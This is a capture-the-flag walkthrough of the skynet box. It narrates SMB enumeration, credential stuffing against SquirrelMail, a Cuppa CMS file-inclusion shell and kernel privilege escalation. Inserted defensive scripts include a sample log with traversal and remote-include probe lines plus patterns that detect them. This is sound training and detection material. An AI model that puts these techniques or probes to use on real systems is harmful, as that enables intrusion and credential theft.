A new, mysterious box. It is Terminator themed, but I have no idea what it will reveal. Let’s dive in!
Not much recon here. Unlike our previous targets, which were “training boxes”, this one doesn’t hold your hand. Let’s enumerate it directly!
Nmap scan:
sudo nmap -T4 -A -p- -oA scan $target_ip
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-02-27T02:05:39-06:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-02-27T08:05:39
|_  start_date: N/A

TRACEROUTE (using port 995/tcp)
HOP RTT      ADDRESS
1   31.41 ms 10.11.0.1
2   31.82 ms 10.10.223.240

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 27 09:05:36 2021 -- 1 IP address (1 host up) scanned in 51.35 seconds
We find the following Samba shares:
Enumerating them further reveals juicy info inside the anonymous share, such as a password list and a message telling us that all employees are required to change their passwords.
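The nmap output above reports SMB message signing as disabled, and the share listing shows an anonymous share handing out a password list without credentials. The script below is an added example, not part of the original write-up: a small POSIX shell audit that reads an smb.conf and reports guest-accessible shares, a permissive "map to guest" setting, and a "server signing" value other than mandatory. The configuration text is constructed for the demo (the share names echo the box, the paths are made up); only the option names are real Samba settings.

```shell
#!/bin/sh
# Added example: audit a Samba smb.conf for anonymous access and optional signing.
# SAMPLE_CONF is a constructed config that reproduces the weaknesses seen in the scan.

SAMPLE_CONF="$(cat <<'EOF'
[global]
   workgroup = WORKGROUP
   server signing = disabled
   map to guest = Bad User

[anonymous]
   path = /srv/samba/anonymous
   guest ok = yes
   read only = yes

[milesdyson]
   path = /home/milesdyson
   valid users = milesdyson
   guest ok = no
EOF
)"

# HARDENED_CONF is the same layout with the three settings corrected (also constructed).
HARDENED_CONF="$(cat <<'EOF'
[global]
   workgroup = WORKGROUP
   server signing = mandatory
   map to guest = Never

[milesdyson]
   path = /home/milesdyson
   valid users = milesdyson
   guest ok = no
EOF
)"

# audit_smb_conf CONFIG_TEXT
# Prints one finding per line; prints nothing when no weak setting is present.
audit_smb_conf() {
    printf '%s\n' "$1" | awk '
        # Section header: strip blanks, remember the share name, move on.
        /^[ \t]*\[/ { gsub(/[ \t]/, ""); section = substr($0, 2, length($0) - 2); next }
        # "key = value" line: trim both sides and compare case-insensitively.
        /=/ {
            key = $0; sub(/=.*/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", key); key = tolower(key)
            val = $0; sub(/^[^=]*=/, "", val); gsub(/^[ \t]+|[ \t]+$/, "", val); val = tolower(val)
            if (section == "global" && key == "server signing" && val != "mandatory")
                print "global: server signing is \"" val "\" (should be mandatory)"
            if (section == "global" && key == "map to guest" && val != "never")
                print "global: map to guest is \"" val "\" (unknown users are mapped to guest)"
            if (section != "global" && key == "guest ok" && val == "yes")
                print section ": guest ok = yes (share is readable without credentials)"
        }
    '
}

# Run the audit against the weak config when executed directly; the hardened
# config produces no findings.
audit_smb_conf "$SAMPLE_CONF"
```

On a real host, feed the function the output of `testparm -s`, which prints the effective configuration with defaults resolved, rather than the raw file, so that options inherited from defaults (including the "disabled" signing default the scan flagged) are visible to the check.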
gobuster reveals a SquirrelMail version 1.4.23 [SVN] installation:
With Burp, we’ll try some credential stuffing in order to log in. From our first SMB recon, we discovered a plausible user, milesdyson, and a list of passwords.
In the Intruder tab, set up a sniper attack, using milesdyson as the user and the password field as the only payload:
We now load the password list found during SMB enumeration:
Finally, we add a “grep match” condition in order to filter our results:
After a little while, we find a working set of credentials, and we are in Miles’ mailbox!
Now, reading Miles’ email, we find a password for Samba:
We can now use it in order to connect to the Samba share, like so:
smbclient \\\\$target_ip\\milesdyson -U milesdyson
Exploring the share reveals an odd file called important.txt. Inside this file, we learn of the existence of a new CMS located at:
Further scanning reveals an admin page:
A quick search shows that Cuppa CMS is vulnerable to RFI/LFI.
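From the defender’s side, both the Intruder credential stuffing against SquirrelMail above and the LFI/RFI probing of the CMS leave a clear trace in the web server’s access log. The script below is an added example (not from the original write-up, nor from SquirrelMail or Cuppa CMS): it runs two checks over an Apache combined-format log, counting POSTs per source IP to SquirrelMail’s login handler src/redirect.php and flagging request paths whose query string carries directory traversal or a remote URL / PHP stream wrapper. The log lines are constructed; the CMS path /cms/administrator/ and the IP addresses are placeholders and not the box’s real values.

```shell
#!/bin/sh
# Added example: two access-log detections written in POSIX sh + awk.
# SAMPLE_LOG is a constructed Apache combined-format log (placeholder IPs and paths).

SAMPLE_LOG="${TMPDIR:-/tmp}/skynet-access-$$.log"
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
10.11.0.5 - - [27/Feb/2021:08:05:01 -0600] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2313 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:05:02 -0600] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:05:02 -0600] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:05:03 -0600] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.0.9 - - [27/Feb/2021:08:05:03 -0600] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:05:04 -0600] "POST /squirrelmail/src/redirect.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:06:10 -0600] "GET /cms/administrator/index.php?page=dashboard HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.11.0.5 - - [27/Feb/2021:08:06:11 -0600] "GET /cms/administrator/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1834 "-" "curl/7.68.0"
10.11.0.5 - - [27/Feb/2021:08:06:12 -0600] "GET /cms/administrator/index.php?page=http://10.11.0.5/x.txt HTTP/1.1" 200 512 "-" "curl/7.68.0"
EOF

# login_bursts LOGFILE THRESHOLD
# Prints "ip count" for every source IP that posted to the SquirrelMail login
# handler at least THRESHOLD times. In combined format field 6 is the quoted
# method and field 7 the request path.
login_bursts() {
    awk -v limit="$2" '
        $6 == "\"POST" && $7 ~ /\/squirrelmail\/src\/redirect\.php/ { n[$1]++ }
        END { for (ip in n) if (n[ip] >= limit) print ip, n[ip] }
    ' "$1" | sort
}

# include_probes LOGFILE
# Prints "ip kind path" for requests whose path shows "../" traversal (after
# decoding %2e/%2f) or a query parameter set to a URL or stream wrapper.
include_probes() {
    awk '
        {
            path = $7
            gsub(/%2[eE]/, ".", path); gsub(/%2[fF]/, "/", path)
            lower = tolower(path)
            if (lower ~ /\.\.\//)
                print $1, "traversal", $7
            else if (lower ~ /[?&][^&]*=(https?|ftp|php|data):/)
                print $1, "remote-include", $7
        }
    ' "$1"
}

# When run directly, show both reports for the sample log.
login_bursts "$SAMPLE_LOG" 3
include_probes "$SAMPLE_LOG"
```

Two caveats for real use: the burst count here spans the whole file, so split the log by time window (or stream it through the check periodically) to catch a slow, spread-out run; and the single-pass percent decoding only handles the two most common encodings, so double-encoded or overlong sequences need a proper URL decoder before the pattern match.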
Getting Initial Shell
We craft the URL to match our target (replacing administrator), set up a listener and get an initial shell:
The user’s flag is in milesdyson’s home folder:
We download our classic tools to the box and launch them. Unfortunately, I didn’t find anything obvious here. I tried a few probable exploits, such as dirtyc0w, and a few others, but nothing worked.
Finally, I paid closer attention to the kernel version and noticed that 4.8.0-58-generic might be vulnerable.
After a few quick steps (download, compile, “send” to target), I was ready to run it, and BOOM! It worked:
Finally, we collect root’s flag:
Another box rooted; it seems that even the inventor of the neural-net processor can’t resist us! :)